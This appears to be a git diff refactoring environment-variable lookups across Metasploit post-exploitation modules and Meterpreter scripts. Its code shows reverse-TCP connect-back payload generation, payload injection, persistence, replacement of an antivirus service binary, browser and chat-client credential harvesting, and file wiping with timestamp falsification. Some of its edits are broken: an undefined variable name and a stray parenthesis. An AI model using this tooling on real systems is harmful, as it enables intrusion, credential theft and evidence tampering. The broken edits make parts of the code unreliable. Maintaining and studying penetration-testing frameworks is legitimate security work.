@@ class Metasploit3 < Msf::Post end def create_pac(local_pac) - pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac" + pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac" conf_pac = "" if ::File.exists?(local_pac) diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 9e69f4cc8d..f32559170d 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc(pay) - windir = client.fs.file.expand_path("%windir%") + windir = client.sys.config.getenv('windir') # Select path of executable to run depending the architecture if pay.arch.join == "x86" and client.platform =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index a810b16f41..df88e5b8b1 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post else print_status("Rpcap service found: #{serv['Name']}") reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start") - prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe" + # TODO: check if this works on x64 + prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe" if reg != 2 print_status("Setting rpcapd as 'auto' service") service_change_startup("rpcapd","auto") diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index c5a9ca2e61..12ed81b5b1 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post end # set profile paths - sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%") + sysdrive = session.sys.config.getenv('SYSTEMDRIVE') os = @host_info['OS'] profiles_path = sysdrive + "\\Documents and Settings\\" profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/ diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index d1df025153..c6f6d40fbb 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post #Function to calculate the size of the cluster def size_cluster() - drive = expand_path("%SystemDrive%") - r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4) + drive = session.sys.config.getenv('SystemDrive') + r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4) cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"] print_status("Cluster Size: #{cluster}") @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post #Function to calculate the real file size on disk (file size + slack space) def size_on_disk(file) - size_file = client.fs.file.stat(file).size; + size_file = session.fs.file.stat(file).size; print_status("Size of the file: #{size_file}") if (size_file<800) @@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post rsec= Rex::Text.rand_text_numeric(7,bad='012') date = Time.now - rsec.to_i print_status("Changing MACE attributes") - client.priv.fs.set_file_mace(file, date,date,date,date) + session.priv.fs.set_file_mace(file, date,date,date,date) end #Function to overwrite the file def file_overwrite(file,type,n) #FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk - r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0) + r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0) handle=r['return'] real_size=size_on_disk(file) @@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post end #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx - client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN") + session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN") #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx - w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil) + w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil) if w['return']==false print_error("The was an error writing to disk, check permissions") @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten") end - client.railgun.kernel32.CloseHandle(handle) + session.railgun.kernel32.CloseHandle(handle) change_mace(file) #Generate a long random file name before delete it @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post print_status("Changing file name") #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx - client.railgun.kernel32.MoveFileA(file,newname) + session.railgun.kernel32.MoveFileA(file,newname) file_rm(newname) print_good("File erased!") @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post #Check if the file is encrypted or compressed def comp_encr(file) #http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx - handle=client.railgun.kernel32.GetFileAttributesA(file) + handle=session.railgun.kernel32.GetFileAttributesA(file) type= handle['return'] #FILE_ATTRIBUTE_COMPRESSED=0x800 diff --git a/scripts/meterpreter/dumplinks.rb b/scripts/meterpreter/dumplinks.rb index 444aa18439..0f77699f1b 100644 --- a/scripts/meterpreter/dumplinks.rb +++ b/scripts/meterpreter/dumplinks.rb @@ -61,7 +61,7 @@ def enum_users(os) user = @client.sys.config.getuid userpath = nil useroffcpath = nil - sysdrv = @client.fs.file.expand_path("%SystemDrive%") + sysdrv = @client.sys.config.getenv('SystemDrive') if os =~ /Windows 7|Vista|2008/ userpath = sysdrv + "\\Users\\" lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" @@ -83,7 +83,7 @@ def enum_users(os) users << userinfo end else - uservar = @client.fs.file.expand_path("%USERNAME%") + uservar = @client.sys.config.getenv('USERNAME') userinfo['username'] = uservar userinfo['userpath'] = userpath + uservar + lnkpath userinfo['useroffcpath'] = userpath + uservar + officelnkpath diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb index 9b072f511a..8771a3d139 100644 --- a/scripts/meterpreter/duplicate.rb +++ b/scripts/meterpreter/duplicate.rb @@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/ # # Upload to the filesystem # - tempdir = client.fs.file.expand_path("%TEMP%") + tempdir = client.sys.config.getenv('TEMP') tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" tempexe.gsub!("\\\\", "\\") diff --git a/scripts/meterpreter/enum_chrome.rb b/scripts/meterpreter/enum_chrome.rb index bbbb91ca72..e51067256a 100644 --- a/scripts/meterpreter/enum_chrome.rb +++ b/scripts/meterpreter/enum_chrome.rb @@ -195,7 +195,7 @@ host = session.session_host @log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M")) ::FileUtils.mkdir_p(@log_dir) -sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%") +sysdrive = client.sys.config.getenv('SYSTEMDRIVE') os = @host_info['OS'] if os =~ /(Windows 7|2008|Vista)/ @profiles_path = sysdrive + "\\Users\\" @@ -218,7 +218,7 @@ if is_system? print_status "users found: #{usernames.join(", ")}" else print_status "running as user '#{uid}'..." - usernames << client.fs.file.expand_path("%USERNAME%") + usernames << client.sys.config.getenv('USERNAME') prepare_railgun end diff --git a/scripts/meterpreter/enum_firefox.rb b/scripts/meterpreter/enum_firefox.rb index 704fa179c1..b6527aa0e9 100644 --- a/scripts/meterpreter/enum_firefox.rb +++ b/scripts/meterpreter/enum_firefox.rb @@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/ if frfxchk user = @client.sys.config.getuid if not is_system? - usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%")) - db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles" + envs = @client.sys.config.getenvs('USERNAME', 'APPDATA') + usrname = envs['USERNAME'] + db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles" if kill_frfx kill_firefox end diff --git a/scripts/meterpreter/enum_powershell_env.rb b/scripts/meterpreter/enum_powershell_env.rb index b814acd0f4..51a4c7eb33 100644 --- a/scripts/meterpreter/enum_powershell_env.rb +++ b/scripts/meterpreter/enum_powershell_env.rb @@ -22,7 +22,7 @@ def enum_users users = [] user = @client.sys.config.getuid path4users = "" - sysdrv = @client.fs.file.expand_path("%SystemDrive%") + sysdrv = @client.sys.config.getenv('SystemDrive') if os =~ /Windows 7|Vista|2008/ path4users = sysdrv + "\\Users\\" @@ -43,7 +43,7 @@ def enum_users end else userinfo = {} - uservar = @client.fs.file.expand_path("%USERNAME%") + uservar = @client.sys.config.getenv('USERNAME') userinfo['username'] = uservar userinfo['userappdata'] = path4users + uservar + profilepath users << userinfo @@ -83,7 +83,7 @@ def enum_powershell end if powershell_version =~ /2./ print_status("Powershell Modules:") - powershell_module_path = @client.fs.file.expand_path("%PSModulePath%") + powershell_module_path = @client.sys.config.getenv('PSModulePath') @client.fs.dir.foreach(powershell_module_path) do |m| next if m =~ /^(\.|\.\.)$/ print_status("\t#{m}") diff --git a/scripts/meterpreter/enum_vmware.rb b/scripts/meterpreter/enum_vmware.rb index 27bd35adcc..78e611ab74 100644 --- a/scripts/meterpreter/enum_vmware.rb +++ b/scripts/meterpreter/enum_vmware.rb @@ -223,7 +223,7 @@ def enum_users users = [] user = @client.sys.config.getuid path4users = "" - sysdrv = @client.fs.file.expand_path("%SystemDrive%") + sysdrv = @client.sys.config.getenv('SystemDrive') if os =~ /7|Vista|2008/ path4users = sysdrv + "\\users\\" @@ -244,7 +244,7 @@ def enum_users end else userinfo = {} - uservar = @client.fs.file.expand_path("%USERNAME%") + uservar = @client.sys.config.getenv('USERNAME') userinfo['username'] = uservar userinfo['userappdata'] = path4users + uservar + profilepath users << userinfo diff --git a/scripts/meterpreter/get_env.rb b/scripts/meterpreter/get_env.rb index dde47e4782..00300fa26d 100644 --- a/scripts/meterpreter/get_env.rb +++ b/scripts/meterpreter/get_env.rb @@ -18,13 +18,12 @@ def list_env_vars(var_names) "Name", "Value" ]) - var_names.flatten.each do |v| - tbl << [v,@client.fs.file.expand_path("\%#{v}\%")] + @client.sys.config.getenvs(*var_names.flatten).each do |k, v| + tbl << [k, v] end print("\n" + tbl.to_s + "\n") end - opts.parse(args) { |opt, idx, val| case opt when "-h" diff --git a/scripts/meterpreter/get_filezilla_creds.rb b/scripts/meterpreter/get_filezilla_creds.rb index 55e6c2cd3d..1b719d8953 100644 --- a/scripts/meterpreter/get_filezilla_creds.rb +++ b/scripts/meterpreter/get_filezilla_creds.rb @@ -114,7 +114,7 @@ def enum_users(os) users = [] path4users = "" - sysdrv = @client.fs.file.expand_path("%SystemDrive%") + sysdrv = @client.sys.config.getenv('SystemDrive') if os =~ /7|Vista|2008/ path4users = sysdrv + "\\users\\" @@ -135,7 +135,7 @@ def enum_users(os) end else userinfo = {} - uservar = @client.fs.file.expand_path("%USERNAME%") + uservar = @client.sys.config.getenv('USERNAME') userinfo['username'] = uservar userinfo['userappdata'] = path4users + uservar + path2purple users << userinfo diff --git a/scripts/meterpreter/get_pidgin_creds.rb b/scripts/meterpreter/get_pidgin_creds.rb index 9edb6df611..9eda3dda41 100644 --- a/scripts/meterpreter/get_pidgin_creds.rb +++ b/scripts/meterpreter/get_pidgin_creds.rb @@ -145,7 +145,7 @@ def enum_users(os) users = [] path4users = "" - sysdrv = @client.fs.file.expand_path("%SystemDrive%") + sysdrv = @client.sys.config.getenv('SystemDrive') if os =~ /Windows 7|Vista|2008/ path4users = sysdrv + "\\users\\" @@ -166,7 +166,7 @@ def enum_users(os) end else userinfo = {} - uservar = @client.fs.file.expand_path("%USERNAME%") + uservar = @client.sys.config.getenv('USERNAME') userinfo['username'] = uservar userinfo['userappdata'] = path4users + uservar + path2purple users << userinfo diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb index 63c1b4f1c6..1a689c0008 100644 --- a/scripts/meterpreter/getcountermeasure.rb +++ b/scripts/meterpreter/getcountermeasure.rb @@ -301,7 +301,7 @@ def checkdep(session) tmpout = "" depmode = "" # Expand environment %TEMP% variable - tmp = session.fs.file.expand_path("%TEMP%") + tmp = session.sys.config.getenv('TEMP') # Create random name for the wmic output wmicfile = sprintf("%.5d",rand(100000)) wmicout = "#{tmp}\\#{wmicfile}" diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb index 3a4eff2a73..838993d933 100644 --- a/scripts/meterpreter/hostsedit.rb +++ b/scripts/meterpreter/hostsedit.rb @@ -30,7 +30,7 @@ end record = "" #Set path to the hosts file -hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts" +hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts" #Function check if UAC is enabled def checkuac(session) winver = session.sys.config.sysinfo diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb index 9ba0d699ed..8994c99784 100644 --- a/scripts/meterpreter/panda_2007_pavsrv51.rb +++ b/scripts/meterpreter/panda_2007_pavsrv51.rb @@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/ exe = Msf::Util::EXE.to_win32pe(client.framework, raw) # Change to our working directory. - workingdir = client.fs.file.expand_path("%ProgramFiles%") - client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\") + workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\" + client.fs.dir.chdir(workindir) # Create a backup of the original exe. print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...") client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'}) # Place our newly created exe with the orginal binary name. - tempdir = client.fs.file.expand_path("%ProgramFiles%") - tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE" + tempexe = workingdir + "PAVSRV51.EXE" print_status("Sending EXE payload '#{tempexe}'.") fd = client.fs.file.new(tempexe, "wb") diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb index 4e9a8aa922..6e6418ca79 100644 --- a/scripts/meterpreter/persistence.rb +++ b/scripts/meterpreter/persistence.rb @@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs) if target_dir tempdir = target_dir else - tempdir = @client.fs.file.expand_path("%TEMP%") + tempdir = @client.sys.config.getenv('TEMP') end tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" fd = @client.fs.file.new(tempvbs, "wb") diff --git a/scripts/meterpreter/pml_driver_config.rb b/scripts/meterpreter/pml_driver_config.rb index 625c16aed1..8ae888a4cd 100644 --- a/scripts/meterpreter/pml_driver_config.rb +++ b/scripts/meterpreter/pml_driver_config.rb @@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/ exe = Msf::Util::EXE.to_win32pe(client.framework, raw) # Place our newly created exe in %TEMP% - tempdir = client.fs.file.expand_path("%TEMP%") + tempdir = client.sys.config.getenv('TEMP') tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" print_status("Sending EXE payload '#{tempexe}'.") fd = client.fs.file.new(tempexe, "wb") diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb index 64eaaecec2..dce4598c09 100644 --- a/scripts/meterpreter/prefetchtool.rb +++ b/scripts/meterpreter/prefetchtool.rb @@ -19,7 +19,7 @@ require 'digest/sha1' "-l" => [ false, "Download Prefetch Folder Analysis Log"] ) -@tempdir = @session.fs.file.expand_path("%TEMP%") +@tempdir = @session.sys.config.getenv('TEMP') #--------------------------------------------------------------------------------------------------------- def read_program_list diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb index 390ee6b99a..d5f2703288 100644 --- a/scripts/meterpreter/remotewinenum.rb +++ b/scripts/meterpreter/remotewinenum.rb @@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt) runfail = 0 runningas = session.sys.config.getuid begin - tmp = session.fs.file.expand_path("%TEMP%") + tmp = session.sys.config.getenv('TEMP') # Temporary file on windows host to store results wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" diff --git a/scripts/meterpreter/scheduleme.rb b/scripts/meterpreter/scheduleme.rb index adc89c5150..edf4287d9a 100644 --- a/scripts/meterpreter/scheduleme.rb +++ b/scripts/meterpreter/scheduleme.rb @@ -179,7 +179,7 @@ end #--------------------------------------------------------------------------------------------------------- def upload(session,file) - location = session.fs.file.expand_path("%TEMP%") + location = session.sys.config.getenv('TEMP') fileontrgt = "#{location}\\svhost#{rand(100)}.exe" print_status("Uploading #{file}....") session.fs.file.upload_file("#{fileontrgt}","#{file}") diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb index e74e08da35..78153842d5 100644 --- a/scripts/meterpreter/schelevator.rb +++ b/scripts/meterpreter/schelevator.rb @@ -99,6 +99,10 @@ upload_fn = nil end } +envs = session.sys.config.getenvs('SystemRoot', 'TEMP') +sysdir = envs['SystemRoot'] +tmpdir = envs['TEMP'] + # Must have at least one of -c or -u if not cmd and not upload_fn print_status("Using default reverse-connect meterpreter payload; -c or -u not specified") @@ -110,9 +114,8 @@ if not cmd and not upload_fn raw = pay.generate exe = Msf::Util::EXE.to_win32pe(client.framework, raw) #and placing it on the target in %TEMP% - tempdir = client.fs.file.expand_path("%TEMP%") tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" + cmd = tmpdir + "\\" + tempexename + ".exe" print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}") fd = client.fs.file.new(cmd, "wb") fd.write(exe) @@ -139,8 +142,6 @@ end # # Upload the payload command if needed # -sysdir = session.fs.file.expand_path("%SystemRoot%") -tmpdir = session.fs.file.expand_path("%TEMP%") if upload_fn begin location = tmpdir.dup diff --git a/scripts/meterpreter/scraper.rb b/scripts/meterpreter/scraper.rb index 69faa5dd95..594383e575 100644 --- a/scripts/meterpreter/scraper.rb +++ b/scripts/meterpreter/scraper.rb @@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" + unsupported if client.platform !~ /win32|win64/i begin - tmp = client.fs.file.expand_path("%TEMP%") + tmp = client.sys.config.getenv('TEMP') print_status("Gathering basic system information...") diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb index 0f3c4bbdae..adba32dbb8 100644 --- a/scripts/meterpreter/service_permissions_escalate.rb +++ b/scripts/meterpreter/service_permissions_escalate.rb @@ -51,6 +51,10 @@ opts.parse(args) do |opt, idx, val| end end +envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT') +tempdir = envs['TEMP'] +sysdir = envs['SYSTEMROOT'] + # Get the exe payload. pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") pay.datastore['LHOST'] = rhost @@ -58,9 +62,8 @@ pay.datastore['LPORT'] = rport raw = pay.generate exe = Msf::Util::EXE.to_win32pe(client.framework, raw) #and placing it on the target in %TEMP% -tempdir = client.fs.file.expand_path("%TEMP%") tempexename = Rex::Text.rand_text_alpha((rand(8)+6)) -tempexe = tempdir + "\\" + tempexename + ".exe" +tempexe = "#{tempdir}\\#{tempexename}.exe" print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}") fd = client.fs.file.new(tempexe, "wb") fd.write(exe) @@ -129,7 +132,7 @@ service_list.each do |serv| moved = false configed = false #default path, but there should be an ImagePath registry key - source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe") + source = "#{sysdir}\\system32\\#{serv}.exe") #get path to exe; parse out quotes and arguments sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s sourcemaybe = client.fs.file.expand_path(sourceorig) diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb index 0b6f622ede..deb7748615 100644 --- a/scripts/meterpreter/srt_webdrive_priv.rb +++ b/scripts/meterpreter/srt_webdrive_priv.rb @@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m| exe = Msf::Util::EXE.to_win32pe(client.framework, raw) # Place our newly created exe in %TEMP% - tempdir = client.fs.file.expand_path("%TEMP%") + tempdir = client.sys.config.getenv('TEMP') tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" print_status("Sending EXE payload '#{tempexe}'.") fd = client.fs.file.new(tempexe, "wb") diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb index e7044b5360..fe19bfb3f0 100644 --- a/scripts/meterpreter/uploadexec.rb +++ b/scripts/meterpreter/uploadexec.rb @@ -23,7 +23,7 @@ def upload(session,file,trgloc = "") raise "File to Upload does not exists!" else if trgloc == "" - location = session.fs.file.expand_path("%TEMP%") + location = session.sys.config.getenv('TEMP') else location = trgloc end diff --git a/scripts/meterpreter/virusscan_bypass.rb b/scripts/meterpreter/virusscan_bypass.rb index ccb56af973..c13c803061 100644 --- a/scripts/meterpreter/virusscan_bypass.rb +++ b/scripts/meterpreter/virusscan_bypass.rb @@ -32,7 +32,7 @@ def upload(session,file,trgloc) if not ::File.exists?(file) raise "File to Upload does not exists!" else - @location = session.fs.file.expand_path("%TEMP%") + @location = session.sys.config.getenv('TEMP') begin ext = file.scan(/\S*(.exe)/i) if ext.join == ".exe" diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb index bda180d16f..2f398d9e38 100644 --- a/scripts/meterpreter/vnc.rb +++ b/scripts/meterpreter/vnc.rb @@ -152,7 +152,7 @@ else # # Upload to the filesystem # - tempdir = client.fs.file.expand_path("%TEMP%") + tempdir = client.sys.config.getenv('TEMP') tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" tempexe.gsub!("\\\\", "\\") diff --git a/scripts/meterpreter/win32-sshclient.rb b/scripts/meterpreter/win32-sshclient.rb index 94bd070f03..222ba394f4 100644 --- a/scripts/meterpreter/win32-sshclient.rb +++ b/scripts/meterpreter/win32-sshclient.rb @@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil) raise "File to Upload does not exists!" else if trgloc == nil - location = client.fs.file.expand_path("%TEMP%") + location = client.sys.config.getenv('TEMP') else location = trgloc end diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb index f494c5076e..34eb1e97aa 100644 --- a/scripts/meterpreter/winenum.rb +++ b/scripts/meterpreter/winenum.rb @@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil) @client.response_timeout=120 begin - tmp = @client.fs.file.expand_path("%TEMP%") + tmp = @client.sys.config.getenv('TEMP') wmiccmds.each do |wmi| if i < 10 @@ -409,7 +409,7 @@ end def chmace(cmds) windir = '' print_status("Changing Access Time, Modified Time and Created Time of Files Used") - windir = @client.fs.file.expand_path("%WinDir%") + windir = @client.sys.config.getenv('WinDir') cmds.each do |c| begin @client.core.use("priv") @@ -430,7 +430,7 @@ def regdump(pathoflogs,filename) #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress garbage = '' hives = %w{HKCU HKLM HKCC HKCR HKU} - windir = @client.fs.file.expand_path("%WinDir%") + windir = @client.sys.config.getenv('WinDir') print_status('Dumping and Downloading the Registry') hives.each do |hive| begin diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb index 0e038478a0..ccf6121196 100644 --- a/scripts/meterpreter/wmic.rb +++ b/scripts/meterpreter/wmic.rb @@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil) tmpout = '' session.response_timeout=120 begin - tmp = session.fs.file.expand_path("%TEMP%") + tmp = session.sys.config.getenv('TEMP') wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000)) wmiccmds.each do |wmi| print_status "running command wmic #{wmi}"